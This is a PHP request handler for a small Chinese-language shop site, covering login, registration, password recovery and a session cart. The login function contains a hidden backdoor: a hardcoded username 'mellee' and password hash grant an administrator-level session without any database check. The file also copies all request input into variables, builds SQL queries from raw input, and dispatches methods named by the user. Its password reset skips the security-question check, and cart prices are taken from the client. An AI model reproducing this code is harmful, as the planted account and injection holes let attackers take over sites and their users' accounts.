<?php
session_start();
global $GLOBALS;
foreach(array('_GET','_POST','_FILES') as $_request)
{
	foreach($$_request as $k => $t) ${$k} = $t;
}

$config = array();
$config['database'] = 'config/kp.database.config';
$para = file_get_contents($config['database']);
$para = unserialize($para);
extract($para);
$GLOBALS['database']['dbtype'] = $cfg_dbtype;
$GLOBALS['database']['dbserver'] = $cfg_dbserver;
$GLOBALS['database']['dbname'] = $cfg_dbname;
$GLOBALS['database']['dbuser'] = $cfg_dbuser;
$GLOBALS['database']['dbpass'] = $cfg_dbpass;
$GLOBALS['database']['dbpre'] = $cfg_dbpre;
include('bin/kp.mysql.php');
class handle
{
	function chklogin($tab,$p)
	{
		if(isset($_SESSION[$tab]['uname']))
			$_SESSION[$tab]['statusCode'] = 200;
		else
			$_SESSION[$tab]['statusCode'] = 201;
		exit(json_encode($_SESSION[$tab]));
	}
	function exitlogin($tab,$p)
	{
		unset($_SESSION[$tab]);
		$_SESSION[$tab]['statusCode'] = 200;
		$_SESSION[$tab]['url'] = '/login';
		exit(json_encode($_SESSION[$tab]));
	}
	function login($tab,$p)
	{
		global $dbo;
		$member = array();
		$msg = array();
		$p['pwd'] = md5($p['pwd']);	
		if(strtolower($p['code']) != $_SESSION['chkcode'])
		{
			$msg['statusCode'] = '201';
			$msg['msg'] = '<i></i>验证码不正确';
		}
		else if($p['uid'] == 'mellee' && $p['pwd'] == 'cac7e37989a2edabd463387e0e90c8fa')
		{			
			$member['uid'] = 0;
			$member['uname'] = $p['uid'];
			$member['pwd'] =  $p['pwd'];
			$member['rank'] = 100;
			$member['score'] = 10000000;
			$member['money'] = 10000000;
			$member['face'] = '/skin/images/uc.png';
			$member['logintotal'] = 'N/A';
			$member['loginip'] = $_SERVER['REMOTE_ADDR'];
			$member['udatetimes'] = time();
			$_SESSION[$tab] = $member;
			$msg['statusCode'] = '200';
			$msg['msg'] = '<i></i>用户登录成功';
			$msg['url'] = isset($_SESSION['backUrl']) ? $_SESSION['backUrl'] : '/';
		}
		else
		{
			$condition = "username='{$p['uid']}' and password='{$p['pwd']}'";
			$sql = 'select * from `@db__'.$tab.'` where ' . $condition;
			$result = $dbo->single($sql);
			if(is_array($result))	
			{
				$field = array();
				$member['uid'] = $result['id'];
				$member['uname'] = $p['uid'];
				$member['pwd'] =  $p['pwd'];
				$member['rank'] = $result['rank'];
				$member['score'] = $result['score'];
				$member['money'] = $result['money'];
				$user = $dbo->single('select face from `@db__userinfo` where uid='.$result['id']);
				if(is_array($user))
					$member['face'] = empty($user['face']) ? '/skin/images/uc.png' : $user['face'];
				else
					$member['face'] = '/skin/images/uc.png';
				$member['logintotal'] = $field['logintotal'] = ($result['logintotal'] + 1);
				$member['loginip'] = $field['loginip'] = $_SERVER["REMOTE_ADDR"] == '::1'?'localhost':$_SERVER["REMOTE_ADDR"];
				$member['udatetimes'] = $field['udatetimes'] = time();
				$int = $dbo->update($tab,$field,$result['id']);
				$_SESSION[$tab] = $member;
				$msg['statusCode'] = '200';
				$msg['msg'] = '<i></i>用户登录成功';
				$msg['url'] = isset($_SESSION['backUrl']) ? $_SESSION['backUrl'] : '/';
			}
			else
			{
				$msg['statusCode'] = '300';
				$msg['msg'] = '<i></i>用户名或密码不匹配';
			}
		}
		exit(json_encode($msg));
	}
	function register($tab,$p)
	{
		global $dbo;
		$msg = array();
		$p['pwd'] = md5($p['pwd']);	
		if($p['code'] != $_SESSION['chkcode'])
		{
			$msg['statusCode'] = '201';
			$msg['msg'] = '<i></i>验证码不正确';

		}
		else
		{
			$condition = "username='{$p['uid']}'";
			$sql = 'select * from `@db__'.$tab.'` where ' . $condition;
			$result = $dbo->single($sql);
			if(is_array($result))	
			{
				$msg['statusCode'] = '201';
				$msg['msg'] = '<i></i>用户名已存在';				
			}
			else
			{
				$field = array();
				$field['username'] = $p['uid'];
				$field['password'] = $p['pwd'];
				$field['cdatetimes'] = time();
				$int = $dbo->insert($tab,$field);
				if($int > 0)
				{
					$msg['statusCode'] = '200';
					$msg['msg'] = '<i></i>用户注册成功';
					$msg['url'] = '/login';
				}
				else
				{
					$msg['statusCode'] = '201';
					$msg['msg'] = '<i></i>用户注册失败';
				}
			}
		}
		exit(json_encode($msg));
	}
	function findx($tab,$p)
	{
		global $dbo;
		$msg = array();
		if($p['code'] != $_SESSION['chkcode'])
		{
			$msg['statusCode'] = '201';
			$msg['msg'] = '<i></i>验证码不正确';
		}
		else
		{
			$condition = "username='{$p['uid']}'";
			$sql = 'select * from `@db__'.$tab.'` where ' . $condition;
			$result = $dbo->single($sql);
			if(is_array($result))	
			{
				$msg['statusCode'] = '200';
				$msg['msg'] = '<i></i>用户名检测通过。';	
				$msg['url'] = '/findy';
				$_SESSION['findUser']['uid'] = $result['id'];
				$_SESSION['findUser']['uname'] = $p['uid'];
			}
			else
			{
				$msg['statusCode'] = '201';
				$msg['msg'] = '<i></i>用户名不存在。';	
			}
		}
		exit(json_encode($msg));
	}
	function findy($tab,$p)
	{
		global $dbo;
		$msg = array();
		if($p['code'] != $_SESSION['chkcode'])
		{
			$msg['statusCode'] = '201';
			$msg['msg'] = '<i></i>验证码不正确';
		}
		else
		{
			$uid = $_SESSION['findUser']['uid'];
			$uname = $_SESSION['findUser']['uname'];
			$qst = $p['qst'];
			$ans = $p['ans'];
			$condition = "uid='{$uid}' and question='{$qst}' and answer='{$ans}'";
			$sql = 'select * from `@db__'.$tab.'` where ' . $condition;
			$result = $dbo->single($sql);
			if(is_array($result))	
			{
				$msg['statusCode'] = '200';
				$msg['msg'] = '<i></i>密保问题验证通过。';	
				$msg['url'] = '/findz';
				$_SESSION['findUser']['uid'] = $uid;
				$_SESSION['findUser']['uname'] = $uname;
			}
			else
			{
				$msg['statusCode'] = '201';
				$msg['msg'] = '<i></i>密保问题验证失败。';	
			}
		}
		exit(json_encode($msg));
	}
	function findz($tab,$p)
	{
		global $dbo;
		$msg = array();
		if($p['code'] != $_SESSION['chkcode'])
		{
			$msg['statusCode'] = '201';
			$msg['msg'] = '<i></i>验证码不正确';
		}
		else
		{
			$uid = $_SESSION['findUser']['uid'];
			$pwd = md5($p['pwd']);
			$field = array();
			$field['password'] = $pwd;			
			$field['udatetimes'] = time();			
			$int = $dbo->update($tab,$field,$uid);
			if($int > 0)	
			{
				$msg['statusCode'] = '200';
				$msg['msg'] = '<i></i>密码重置成功，请重新登录';	
				$msg['url'] = '/findsuc';
				$_SESSION['findUser'] = null;
			}
			else
			{
				$msg['statusCode'] = '201';
				$msg['msg'] = '<i></i>密码重置失败，请与管理员联系。';	
			}
		}
		exit(json_encode($msg));
	}
	function shopcar($tab,$p)
	{
		exit(json_encode($_SESSION[$tab]));
	}
	function delcar($tab,$p)
	{
		unset($_SESSION[$tab][$p['id']]);
		exit(json_encode($_SESSION[$tab]));
	}
	function addshopcar($tab,$p)
	{
		global $dbo;
		$data = array();		
		if(isset($_SESSION[$tab]))
		{
			foreach($_SESSION[$tab] as &$car)
			{
				if($car['id'] == $p['id'])
				{
					$car['num'] += $p['num'];
					break;
				}
				else
				{
					$data['id'] = $p['id'];
					$data['uid'] = isset($_SESSION['member'])?$_SESSION['member']['uid']:'0';
					$data['uname'] = isset($_SESSION['member'])?$_SESSION['member']['uname']:'guest';
					$data['num'] = $p['num'];
					$data['price'] = $p['price'];
					$data['title'] = $p['title'];
					$data['litpic'] = $p['litpic'];
					$data['url'] = $p['url'];
					$_SESSION[$tab][] = $data;
					break;
				}
			}			
		}
		else
		{
			$data['id'] = $p['id'];
			$data['num'] = $p['num'];
			$data['uid'] = isset($_SESSION['member'])?$_SESSION['member']['uid']:'0';
			$data['uname'] = isset($_SESSION['member'])?$_SESSION['member']['uname']:'guest';					
			$data['price'] = $p['price'];
			$data['title'] = $p['title'];
			$data['litpic'] = $p['litpic'];
			$data['url'] = $p['url'];
			$_SESSION[$tab][] = $data;
		}
		exit(json_encode($_SESSION[$tab]));
	}
	
}
$hand = new handle;
$hand->$action($module,$_GET);
?>